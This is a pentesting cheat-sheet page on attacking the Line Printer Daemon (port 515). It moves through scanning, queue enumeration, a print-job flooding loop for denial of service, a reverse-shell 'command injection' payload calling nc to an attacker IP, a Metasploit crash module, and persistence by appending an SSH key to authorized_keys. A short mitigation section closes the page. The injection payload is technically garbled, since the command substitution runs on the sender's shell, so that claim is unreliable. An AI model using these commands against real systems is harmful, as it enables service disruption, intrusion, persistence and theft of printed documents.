Line Printer Daemon (LPD) - Port 515
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Basic Info
Port Number: 515
Service: Line Printer Daemon (LPD)
Common Usage: LPD is a network printing protocol used to manage print jobs on UNIX and Linux systems. It allows remote computers to submit print jobs to a central print server.
Default State: Open on many older UNIX/Linux distributions, but often disabled in modern systems.
Security Concerns:
Lacks authentication, allowing unauthorized access if improperly configured.
Susceptible to command injection and buffer overflow attacks.
Can be used for denial-of-service (DoS) attacks by sending large or malformed print jobs.
Print job manipulation may allow sensitive document interception.
How to Connect
Manually Connecting to LPD
LPD listens on port 515 and operates by receiving print job commands. You can interact with it manually using netcat
or telnet
:
nc -v [Target-IP] 515
If the connection is successful, LPD is running and ready for further enumeration.
You can also check the /etc/printcap file (if accessible) to see available printers:
cat /etc/printcap
Reconnaissance (Recon)
Scanning for Port 515
Use Nmap to detect if the LPD service is running:
nmap -p 515 -sV -T4 [Target-IP]
Expected output:
515/tcp open printer Line Printer Daemon (LPD)
For a deeper scan using NSE scripts:
nmap --script=lpd-enum -p 515 [Target-IP]
This will attempt to enumerate available printers and configurations.
Enumeration
Checking Printer Queues
If LPD is running, you can list print queues using:
lpq -S [Target-IP]
If no authentication is required, this command may reveal active print jobs.
Enumerating Available Printers
Try checking the configuration of remote printers:
lpstat -v -h [Target-IP]
If a printer is misconfigured, it might allow arbitrary command execution.
Attack Vector
Anonymous Printing Abuse β If LPD is open and does not require authentication, an attacker can send unlimited print jobs, leading to resource exhaustion (Denial of Service).
Command Injection in Print Jobs β Certain LPD implementations allow escape sequences that can lead to remote code execution.
Directory Traversal β Some older LPD implementations allow path traversal, enabling an attacker to overwrite files outside the spool directory.
Print Job Interception β If an attacker gains access, they may be able to capture sensitive documents submitted for printing.
Exploitation
Exploiting Open Print Queue for DoS
Send a large number of print jobs to overwhelm the system:
for i in {1..1000}; do
echo "Fake print job $i" | lpr -S [Target-IP] -P [Printer-Name]
done
This fills the print queue, preventing legitimate users from printing.
Command Injection via LPD Escape Sequences
Some LPD services allow malicious escape sequences that execute shell commands. Try submitting a print job with a malicious payload:
echo -e "\033[31m$(nc -e /bin/sh [Attacker-IP] 4444)\033[0m" | lpr -S [Target-IP] -P [Printer-Name]
If successful, this opens a reverse shell on the target system.
Metasploit Exploit for LPD
Metasploit has modules that can exploit LPD misconfigurations:
use auxiliary/dos/lpd/lpd_crash
set RHOSTS [Target-IP]
exploit
This attempts to crash the LPD service.
Tools Used
Nmap β Scanning and service detection
LPQ / LPSTAT β Printer queue enumeration
Netcat (nc) β Manual interaction and exploitation
Hydra β Brute-force login attempts (if authentication is enabled)
Metasploit β LPD-specific exploits and auxiliary modules
Burp Suite β If a web-based printer management interface is available
Post-Exploitation
Privilege Escalation
If you gain access through LPD, check for SUID binaries to escalate privileges:
find / -perm -4000 -type f 2>/dev/null
Maintaining Access
To maintain persistence, add an SSH key to the target machine:
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
Extracting Sensitive Print Jobs
If access is gained, look for spool files that contain document data:
ls -lah /var/spool/lpd/
Print jobs often contain PII (Personally Identifiable Information) or sensitive corporate data.
Mitigation & Defense
To secure against LPD exploitation: β Disable LPD if not required:
systemctl stop lpd
systemctl disable lpd
β Restrict access using firewall rules:
iptables -A INPUT -p tcp --dport 515 -s [Trusted-IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 515 -j DROP
β Enforce authentication for print jobs and disable guest access. β Use modern alternatives like CUPS (Common Unix Printing System) with encrypted communication.
Learn & practice For the Bug Bounty
Last updated
Was this helpful?